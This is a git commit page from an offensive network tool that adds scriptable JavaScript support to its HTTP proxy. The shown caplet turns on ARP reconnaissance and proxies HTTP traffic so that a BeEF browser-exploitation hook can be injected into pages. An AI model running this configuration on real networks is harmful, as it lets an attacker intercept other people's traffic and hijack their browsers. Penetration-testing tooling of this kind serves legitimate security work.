new: http proxy can now be scripted with js files

This commit is contained in:
evilsocket 2018-01-07 22:51:18 +01:00
commit 98d1a028ed
12 changed files with 345 additions and 124 deletions

15
caplets/beef-passive.cap Normal file
View file

@ -0,0 +1,15 @@
# inject beef hook
set http.proxy.script caplets/beef-inject.js
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
active